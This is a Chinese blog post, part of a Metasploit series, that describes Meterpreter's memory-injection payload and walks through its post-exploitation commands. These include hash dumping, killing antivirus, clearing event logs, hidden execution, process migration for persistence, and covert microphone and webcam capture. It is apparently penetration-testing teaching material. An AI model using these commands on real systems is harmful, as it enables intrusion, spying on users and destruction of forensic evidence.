• metasploit framework(五):meterpreter基本命令和python扩展


    基于内存的DLL注入式payload

      注入合法的系统进程并建立stager

      基于stager上传和预加载DLL进行扩展模块的注入(客户端API)

      基于stager建立的socket连接建立加密的TLS/1.0通信隧道(避免网络取证)

      利用TLS隧道进一步加载后续扩展模块

    meterpreter服务器使用C语言编写,客户端基于ruby的全特性API(支持任何语言)

     

    进入到meterpreter的shell

    help命令查看命令帮助手册

    background后退到msf的命令提示符界面

    pwd当前目录,cd,ls,mkdir,rmdir删除目录,mv,cat,rm,edit相当于vi,

    lcd,lpwd 本地linux的目录操作

    run运行模块

    bgrun后台运行模块,有两百多个模块可以使用

    比如杀掉杀毒程序的模块

     获取用户密码hash

    远程桌面

    clearev 清除事件日志

    清理前可以看到这么多日志

    运行clearev之后

     时间日志就被清除了

     

    download 下载文件

    将目标主机上的文件下载到本地

    upload 上传文件

    将本机文件上传到目标机器上

    上传一个nc.exe到目标主机

    执行execute

    execute -f cmd.exe -i -H

    后台执行cmd.exe

    getuid查看当前账号

    getsystem获取system权限

    getprivs,查看权限

    getproxy,获取代理

    getpid 查看payload注入的是哪个进程

    ps查看目标主机上运行的进程,可以看到对应的进程是svchost.exe

    我们可以将注入迁移到其他的进程 migrate

    比如迁移到explorer.exe上,注入更持久

    就迁移到1512进程上了

    sysinfo查看目标主机信息

    kill 杀死进程

    reboot重启目标机器

    shell获取shell

    show_mount 查看硬盘信息

    搜索文件

    arp 查看arp缓存

    netstat查看网络连接情况

    ifconfig、ipconfig 查看当前IP

    route 查看路由表

    route -add 添加路由表 -delete删除路由表

    idletime 查看目标机器空闲时间

    resource 添加脚本执行文件,一键执行多条指令

    比如先建立一个脚本文件

    里面打个比方放上两条指令

    然后调用这个脚本文件 resource -r r.txt,就逐步执行刚才的两条指令

    record_mic 记录麦克风

    webcam_list 列出目标机器上连接的摄像头

    webcam_snap -i 1 -v false 每隔一秒拍摄一张图片

    meterpreter python 扩展

    客户端无需运行环境,就可以运行原生python代码,无需编译

    这个扩展是以插件的形式,需要加载到meterprete

     help查看就会看到多出来几个python的命令

    python execute 直接执行命令

    python_import 加载python文件

    比如有一个find.py

    执行

    然后就可以自己写python工具!

  • 相关阅读:
    Vijos P1597 2的幂次方【进制+递归】
    NUC1100 Biorhythms【中国剩余定理】
    HDU1370 Biorhythms【中国剩余定理】
    NUC1090 Goldbach's Conjecture【哥德巴赫猜想 】
    NUC1305 哥德巴赫猜想
    剑指Offer——最小的K个数
    剑指Offer——数组中出现次数超过一半的数字
    剑指Offer——字符串的排列
    剑指Offer——二叉搜索树与双向链表
    剑指Offer——复杂链表的复制
  • 原文地址:https://www.cnblogs.com/zylq-blog/p/6774782.html
Copyright © 2020-2023  润新知